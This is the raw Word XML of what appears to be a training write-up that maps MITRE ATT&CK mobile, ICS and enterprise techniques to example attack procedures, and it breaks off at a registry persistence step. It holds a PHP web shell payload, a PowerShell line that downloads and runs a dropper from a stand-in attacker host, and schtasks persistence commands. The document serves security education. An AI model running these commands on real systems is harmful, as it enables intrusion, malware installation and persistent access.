    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="23BD4FB9" w14:textId="33479F2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rootkits install themselves directly into the </w:t>
      </w:r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>/system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partition on rooted Android devices, making it hard to remove them even after factory resets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="046A6C5A" w14:textId="34E3190A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5. T1430 – Exfiltration Over Cellular Network</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="7D1694B4" w14:textId="5861A6C6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Data is stolen and sent over cellular data rather than Wi-Fi to avoid detection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="098F4CED" w14:textId="0F675D1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Advanced spyware apps like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FinFisher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Pegasus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exfiltrate audio recordings, images, and location data using encrypted channels over mobile data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="1F876A5A" w14:textId="2AF9A674"/>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="42FAA334" w14:textId="681C3943">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299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3. ICS Techniques (MITRE ATT&amp;CK for Industrial Control Systems)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="0868E945" w14:textId="54A047BD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281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T0806 – Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="240BDE3D" w14:textId="49AAFC45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use stolen or default usernames and passwords to access ICS systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="76D910FA" w14:textId="06F2369E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many ICS environments, systems are shipped with default credentials like </w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="537E24C8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>admin/admin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These are rarely changed and were exploited in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Industroyer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attacks against Ukraine’s power grid.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="4C75C489" w14:textId="32FA193A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2. T0814 – Modify Control Logic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="548B9232" w14:textId="6F90D537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The attacker changes how a PLC or DCS behaves, affecting real-world processes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="13C13FE4" w14:textId="3EBC44AC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Stuxnet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attack, attackers reprogrammed centrifuges to spin at abnormal speeds while hiding the changes from operators. This caused physical damage without immediate detection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="4826312D" w14:textId="24D2F286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3. T0859 – Firmware Modification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="7EBE324D" w14:textId="6F54ACC7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replace or modify device firmware to insert backdoors or change behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="7199A4FA" w14:textId="7B7D87E1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TRITON malware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targeted firmware in Schneider Electric’s Triconex safety systems. Its goal was to disable physical safety features in critical infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="135F4499" w14:textId="44DD2D26">
      <w:pPr>
        <w:pStyle w:val="Heading3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4. T0809 – Remote System Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="36CD7EEE" w14:textId="41574F32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After gaining access, attackers scan the network for other ICS devices.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="76A98218" w14:textId="1DCE7DDD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APT33 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reportedly scanned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ICS-related ports like 502 (Modbus) and 44818 (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EtherNet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/IP) in industrial environments to map out control systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="6332A032" w14:textId="05440BD1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="537E24C8">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5. T0815 – Alarm Suppression</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="53C251E3" w14:textId="2C133B4C">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pP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Attackers disable or suppress safety alarms in HMIs or SCADA systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="537E24C8" w:rsidP="3E79F1B8" w:rsidRDefault="537E24C8" w14:paraId="02CFAD52" w14:textId="063AC4E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Industroyer</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="537E24C8">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, attackers were able to silence alarms and hide abnormal operations from control room operators, delaying response time to outages in the power gri</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="537E2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d.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="6E8C99E8" w14:textId="0A0CC4D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F21079" w:rsidP="3E79F1B8" w:rsidRDefault="69F21079" w14:paraId="4DB4C427" w14:textId="72C24B4C">
      <w:pPr>
        <w:pStyle w:val="Heading1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E79F1B8" w:rsidR="69F21079">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WORKFLOW</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="52E4AD3E" w14:textId="2B49ADB7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299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Tactic: Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="66BB1325" w14:textId="70A88F83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 Access tactics represent how adversaries try to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gain a foothold inside a target network or system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It’s often the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step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cyberattack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="6BF05A83" w14:textId="14B4E420"/>
    <w:p w:rsidR="3B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="698324A0" w14:textId="33C741D4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Technique 1: T1566.002 – Spearphishing Link</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="59445A2E" w14:textId="7B1E96E9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🔗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84260da8fc39427c">
        <w:r w:rsidRPr="3E79F1B8" w:rsidR="3B2967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https://attack.mitre.org/techniques/T1566/002</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="5ED11BB8" w14:textId="19522B93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Procedure:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="0237C101" w14:textId="793726C3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crafts a fake HR email offering a salary revision.</w:t>
      </w:r>
      <w:r>
        <w:br/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Embeds a shortened malicious link:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="4445BAB6" w14:textId="35F221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fb60a902cf4740a8">
        <w:r w:rsidRPr="3E79F1B8" w:rsidR="3B29670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https://bit.ly/hr-policy-update</w:t>
        </w:r>
        <w:r>
          <w:br/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="30382225" w14:textId="00469A0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redirects to:</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="5B222E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hyperlink>
        <w:r w:rsidRPr="3E79F1B8" w:rsidR="3B29670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http://attacker[.]com/hr_policy.exe</w:t>
        </w:r>
        <w:r>
          <w:br/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="20107026" w14:textId="629D1DE6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Victim clicks the link and unknowingly downloads the disguised malware.</w:t>
      </w:r>
      <w:r>
        <w:br/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user executes the file manually, thinking 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document or software update.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="42B31087" w14:textId="7B99317A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Outcome:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="21A709EF" w14:textId="55372877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>Malicious payload is executed. Attacker gains an initial foothold into the system with user-level privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="123ACE3B" w14:textId="1C0D80B6"/>
    <w:p w:rsidR="3B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="480D2939" w14:textId="0C267A01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️ Technique 2: T1190 – Exploit Public-Facing Application</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="233D8582" w14:textId="4BA6291A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294b4339ab40431b">
        <w:r w:rsidRPr="3E79F1B8" w:rsidR="3B2967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https://attack.mitre.org/techniques/T1190</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="3BDC8302" w14:textId="43BC2974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Procedure:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="22AF48B8" w14:textId="1B9CFDD7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scans target organization’s web servers using tools like </w:t>
      </w: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Nmap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Nikto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identify vulnerabilities.</w:t>
      </w:r>
      <w:r>
        <w:br/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Finds an outdated WordPress plugin with known RCE vulnerability.</w:t>
      </w:r>
      <w:r>
        <w:br/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Sends a specially crafted HTTP POST request:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="04B236EE" w14:textId="3D03CDD9">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
      </w:pP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w:rsidR="3B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="7BEBE961" w14:textId="24B1C4C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/wp-content/plugins/vuln-plugin/upload.php HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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Payload: &lt;?php system($_GET['cmd']); ?&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="268E9865" w14:textId="7E74FAA6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gains a web shell on the server and executes commands like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="2A9EC7F5" w14:textId="09AF0B93">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
      </w:pP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3B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="7C368F33" w14:textId="1E2CDD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eae84324291e4b86">
        <w:r w:rsidRPr="3E79F1B8" w:rsidR="3B29670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http://victim.com/upload/shell.php?cmd=whoami</w:t>
        </w:r>
        <w:r>
          <w:br/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="03C97A6E" w14:textId="586B0C44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Outcome:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="20ACE3BA" w14:textId="238C42EA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>Attacker gets remote command execution on the public-facing server, establishing a foothold.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="115093E9" w14:textId="29A8AE37"/>
    <w:p w:rsidR="3B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="16C1C656" w14:textId="37E698C2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Technique 3: T1133 – External Remote Services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="74D84A2C" w14:textId="27920AB2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be82cf360e8041c1">
        <w:r w:rsidRPr="3E79F1B8" w:rsidR="3B2967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https://attack.mitre.org/techniques/T1133</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="76A937D7" w14:textId="67EB14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B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="752858C5" w14:textId="5C683F5D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Procedure:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="27036E5D" w14:textId="7E614C9D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identifies an exposed Remote Desktop Protocol (RDP) endpoint using Shodan or masscan.</w:t>
      </w:r>
      <w:r>
        <w:br/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credentials obtained from a data breach or password spraying attack.</w:t>
      </w:r>
      <w:r>
        <w:br/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Connects via RDP:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="43B77A4C" w14:textId="42E9AD6C">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
      </w:pP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3B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="59707936" w14:textId="774B3E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3B296706">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mstsc /v:203.0.113.10</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="365E3DE8" w14:textId="37049050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Gains interactive access to the system over the internet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="602C591D" w14:textId="01197A33">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="3B2967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3B296706" w:rsidP="3E79F1B8" w:rsidRDefault="3B296706" w14:paraId="6711FF1F" w14:textId="10A89B78">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="3B296706">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Attacker logs in using valid credentials, bypassing need for malware or phishing. Gains full access to the remote desktop environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="28DE77DF" w14:textId="3F99FF19"/>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="427760E7" w14:textId="68BED60F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299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Tactic 2: Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="6AB1BA36" w14:textId="50BD6B4D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Execution tactic involves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 malicious code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local or remote system after gaining initial access. It's how adversaries begin interacting with the system directly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="4CBD5786" w14:textId="4B6A73AF"/>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="67D7A3F9" w14:textId="3E6E2773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Technique 1: T1059.001 – Command and Scripting Interpreter: PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="275E1C69" w14:textId="03EE81EA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f31981b9f00241d2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https://attack.mitre.org/techniques/T1059/001</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="1FE8EBF6" w14:textId="294FE3CB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Procedure:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="0157C0CF" w14:textId="1258F4DC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writes a PowerShell payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="1A32BA2E" w14:textId="2B492F8A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w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="2ABE9CC4" w14:textId="3AAFC3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067E682D" w14:textId="2EF3464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Invoke-WebRequest </w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="3E79F1B8" w:rsidR="42DD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http://attacker[.]com/dropper.exe</w:t>
        </w:r>
      </w:hyperlink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-OutFile dropper.exe; Start-Process dropper.exe</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="2E914578" w14:textId="5176548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Encodes the command in base64 and sends it to the victim via phishing:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="43EAFFFA" w14:textId="253F3C24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w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="1A92F471" w14:textId="4E4F40D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04FAE2B0" w14:textId="0ACC21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powershell.exe -EncodedCommand &lt;base64payload&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="2183D7B1" w14:textId="2AA78CE5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Victim executes the script, either manually or via macro execution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="195ED165" w14:textId="2BED4A16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482B4E3F" w14:textId="08417558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PowerShell runs silently in memory, downloading and executing malware without dropping files detectable by antivirus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="7F0F5F74" w14:textId="5AC2F15B"/>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="374FC509" w14:textId="15AE5B3D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️ Technique 2: T1203 – Exploitation for Client Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="14C48CB2" w14:textId="1DD3BFCE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81fefd8b39e84b81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https://attack.mitre.org/techniques/T1203</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="7A88FA75" w14:textId="5CA8777A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="3E79F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Procedure:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="24AE151A" w14:textId="2D9745D0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sends a PDF with an embedded JavaScript exploit (targeting CVE-2021-40444).</w:t>
      </w:r>
      <w:r>
        <w:br/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Victim opens the PDF in an outdated PDF reader.</w:t>
      </w:r>
      <w:r>
        <w:br/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exploit launches a hidden command shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="472B694B" w14:textId="6CF7BB8A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</w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="7E72560F" w14:textId="042704A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7D5E9032" w14:textId="34EC64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cmd.exe /c powershell -ExecutionPolicy Bypass -File payload.ps1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="6C73B54B" w14:textId="33102BBE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Payload installs a remote access trojan.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="659A0BBA" w14:textId="6F96A082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4E4A4D04" w14:textId="047A2B1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Victim is exploited without needing to enable macros or click further—leading to instant malware execution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="72D5C384" w14:textId="6FEA4232"/>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="5627DA04" w14:textId="4F11E246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️ Technique 3: T1053.005 – Scheduled Task: Scheduled Task/Job</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="46CE0717" w14:textId="6353CCE0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🔗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ba5336e7eb944253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https://attack.mitre.org/techniques/T1053/005</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="78026572" w14:textId="56BBA4A5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Procedure:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="0C852C11" w14:textId="6424804D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gains user access and creates a malicious </w:t>
      </w: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.bat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file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="5395D1B7" w14:textId="33094480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</w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="3E5C68F2" w14:textId="5E0933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03116B69" w14:textId="13A1E55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echo powershell -File C:\Users\Public\payload.ps1 &gt; C:\malware.bat</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="4EA24D08" w14:textId="62331BA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Registers a Windows task to run it daily:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="1F955CD2" w14:textId="00058286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</w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="7FA44BF5" w14:textId="6DC979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4F261E81" w14:textId="7D4372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schtasks /create /tn "Updater" /tr "C:\malware.bat" /sc daily /st 06:00</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="01E4FD9E" w14:textId="36325A2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task runs at 6:00 AM daily, ensuring continuous execution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="495F0D82" w14:textId="275E35EB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69429B94" w14:textId="55A04B4D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Attacker’s script runs persistently every day, executing malware without user intervention.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="344BE1B2" w14:textId="15A376E9"/>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="0BFEDF74" w14:textId="1C876A1F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299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Tactic 3: Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="02395D1D" w14:textId="0B0C3821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Persistence techniques allow adversaries to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 their foothold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 after reboots, logoffs, or detection efforts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="57FDDC03" w14:textId="07FEEBB7"/>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="21932605" w14:textId="783DFCFF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️ Technique 1: T1547.001 – Boot or Logon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Autostart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Execution: Registry Run Key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="64F57655" w14:textId="0D3F6639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d9e166923fa24274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https://attack.mitre.org/techniques/T1547/001</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="08E94721" w14:textId="70E14FE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E79F1B8" w:rsidR="3E79F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Procedure:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="77A821DD" w14:textId="57DF0A0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uploads malware to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="05FFDA42" w14:textId="528F33AE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makefile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="73BF4F8C" w14:textId="7FA618B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079C1FE2" w14:textId="54D8DF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C:\Users\victim\AppData\Roaming\update.exe</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DD4FB3" w:rsidP="3E79F1B8" w:rsidRDefault="42DD4FB3" w14:paraId="7167B8B9" w14:textId="7F6F23DC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Modifies the registry:</w:t>
      </w:r>
    </w:p>
